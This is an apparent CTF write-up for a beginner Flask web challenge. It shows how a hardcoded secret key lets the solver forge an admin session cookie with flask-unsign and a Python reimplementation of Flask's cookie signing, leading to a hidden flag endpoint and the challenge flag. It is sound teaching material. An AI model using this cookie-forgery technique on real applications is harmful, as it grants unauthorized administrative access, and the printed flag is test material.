# Baby Web
### Challenge Details
> Author: Junhua \
Category: Web \
Title: Baby Web \
Description: I just learnt how to design my favourite `flask` webpage using `htmx` and `bootstrap`. I hope I don't accidentally expose my super secret flag. \
Points at the end of CTF: 100 \
Instance: http://challs.nusgreyhats.org:33338/ \
Download: https://ctfd.nusgreyhats.org/files/c740b51c8a401dd644fb337268cf3867/dist-baby-web.zip
----
### TLDR
Execute the following commands in order:
```sh
pip install flask-unsign
flask-unsign -s -c "{'is_admin': True}" -S baby-web
```
Copy the cookie output by the previous command into the session cookie using Chrome devtools.
Reload http://challs.nusgreyhats.org:33338/admin.
Check the page source and see that the hidden button points at http://challs.nusgreyhats.org:33338/flag.
Go to said link, get flag.
----
### Writeup
As indicated by the title, this challenge is pretty easy, even a toddler could solve it (which is probably why it was one of the only challs I could solve).
First of all, `wget` the download link, and open the instance in a new tab with Chrome devtools open.
Inspecting the source code, a few things stand out:
1. Line 5:
```py
app.secret_key = "baby-web"
```
2. Lines 17 to 20:
```py
@app.route("/admin")
def admin():
    # Check if the user is admin through cookies
    return render_template("admin.html", flag=FLAG, is_admin=session.get("is_admin"))
```
Particularly,
```py
is_admin=session.get("is_admin")
```
3. The use of Flask's client-side sessions, which are notoriously easy to forge once the secret key is known.
Ah, a classic Flask cookie challenge. In a Flask session cookie, the first part before the period separator can be base64 decoded to get some data. However, to generate a cookie from data, you need the "super secret key" to sign the data. Well, I was in luck this time, no bruteforcing required. Refer to the first key (pun not intended) thing I noted: `app.secret_key = "baby-web"`. So now we have to find out what algorithm is used to sign...
Wait, I almost forgot, we're programmers. In other words, lazy people. There's already a tool to do that for us, called `flask-unsign`.
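For anyone who does want to know what `flask-unsign` is doing under the hood, here is an added example (not from the writeup and not the challenge's code) that reimplements Flask's session cookie format with the standard library only: itsdangerous' `URLSafeTimedSerializer` with salt `cookie-session`, "hmac" key derivation and SHA-1, producing `payload.timestamp.signature`. `decode_payload` shows the data is merely encoded, `verify` lets you check which key a cookie was issued under, and the round trip shows why an unguessable `secret_key` is the entire defence; `constructed-strong-key` is a stand-in, not the challenge's key.

```python
import base64, hashlib, hmac, json, time, zlib

# Flask signs sessions with itsdangerous' URLSafeTimedSerializer: salt "cookie-session",
# "hmac" key derivation, SHA-1, "." separators, payload = base64(json) (zlib-compressed if shorter).
SALT = b"cookie-session"
PAGE_COOKIE = "eyJpc19hZG1pbiI6ZmFsc2V9.Zi6Dww.k_8s7jUrZn-Gn17kVygRmlBC07k"  # cookie quoted in the writeup

def _b64e(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def _b64d(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def _derived_key(secret: str) -> bytes:
    # itsdangerous "hmac" key derivation: the signing key is HMAC-SHA1(secret_key, salt).
    return hmac.new(secret.encode(), SALT, hashlib.sha1).digest()

def decode_payload(cookie: str) -> dict:
    """Session data is readable without any key: it is encoded and signed, never encrypted."""
    payload = cookie.rsplit(".", 2)[0]
    compressed = payload.startswith(".")  # a leading dot marks a zlib-compressed payload
    raw = _b64d(payload[1:] if compressed else payload)
    return json.loads(zlib.decompress(raw) if compressed else raw)

def sign(data: dict, secret: str, timestamp=None) -> str:
    """Build the cookie Flask would issue for session contents `data` under this secret_key."""
    raw = json.dumps(data, separators=(",", ":")).encode()
    packed = zlib.compress(raw)
    payload = "." + _b64e(packed) if len(packed) < len(raw) - 1 else _b64e(raw)
    ts = int(time.time()) if timestamp is None else timestamp
    signed = payload + "." + _b64e(ts.to_bytes((ts.bit_length() + 7) // 8, "big"))
    sig = hmac.new(_derived_key(secret), signed.encode(), hashlib.sha1).digest()
    return signed + "." + _b64e(sig)

def verify(cookie: str, secret: str, max_age=None) -> bool:
    """True only if the signature was made with `secret` (and, if max_age is set, recently enough)."""
    parts = cookie.rsplit(".", 2)
    if len(parts) != 3:
        return False
    signed = parts[0] + "." + parts[1]
    try:
        expected = hmac.new(_derived_key(secret), signed.encode(), hashlib.sha1).digest()
        ok = hmac.compare_digest(expected, _b64d(parts[2]))
        issued = int.from_bytes(_b64d(parts[1]), "big")
    except ValueError:  # malformed base64 in the timestamp or signature
        return False
    return ok and (max_age is None or time.time() - issued <= max_age)

if __name__ == "__main__":
    print(decode_payload(PAGE_COOKIE), verify(PAGE_COOKIE, "baby-web"))  # no key needed to read it; True iff issued under "baby-web"
    c = sign({"is_admin": False}, "constructed-strong-key")  # constructed key, not the challenge's
    print(verify(c, "constructed-strong-key"), verify(c, "baby-web"))  # True False: a wrong guess of the key gets nothing
```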
Run `pip install flask-unsign` in a terminal if you haven't installed it already.
Afterwards, get the session cookie from your instance tab using Chrome devtools, for me it was:
`eyJpc19hZG1pbiI6ZmFsc2V9.Zi6Dww.k_8s7jUrZn-Gn17kVygRmlBC07k`
Try doing `flask-unsign -d -c eyJpc19hZG1pbiI6ZmFsc2V9.Zi6Dww.k_8s7jUrZn-Gn17kVygRmlBC07k`. The flags `-d` and `-c` here tell the tool to **d**ecode the **c**ookie which follows the `-c` flag.
You should get `{'is_admin': False}` as the output.
All we have to do is change the False value of the boolean to True and create a cookie off it.
To do that, execute `flask-unsign -s -c "{'is_admin': True}" -S baby-web`, where the flags `-s`, `-c`, and `-S` mean to **s**ign a **c**ookie with value "{'is_admin': True}" using the **S**ecret key "baby-web". Doing that should give `eyJpc19hZG1pbiI6dHJ1ZX0.Zi6Nyg.xY-dzypVfkGoUokUgG8fW3RLSIk`.
Now replace the current session cookie with our new cookie and refresh the page at http://challs.nusgreyhats.org:33338/admin. The previously restricted page should now show "This website is still under construction. I have completed the admin page where only I can access. Too bad my secret is not so easily given away".
Darn! They know us too well. Or do they? Open Chrome devtools on the page again and inspect the HTML code.
```html
<div class="modal-body">
  Wow!, you found the super secret admin button.
  <br />
  <button hx-get="/flag" hx-swap="outerHTML" class="btn btn-secondary">
    Here is an even more secret button.
  </button>
</div>
```
They want us to find a secret button. No clue how to do that on the page itself, but we can see that this very well-veiled button has a not-so-veiled `hx-get` pointing at http://challs.nusgreyhats.org:33338/flag. Visit that page and you get:
> Here is your flag: \
grey{0h_n0_mY_5up3r_53cr3t_4dm1n_fl4g}
----
### Comments
Pretty fun challenge. Although I didn't solve it on the CTF day itself (I was away from my computer during that time and could only solve challenges through my phone), I managed to get it once I got back and seriously attempted some of the challenges.
\
\
Writeup authored by a very bad amateur CTF player who goes under the alias "quetz".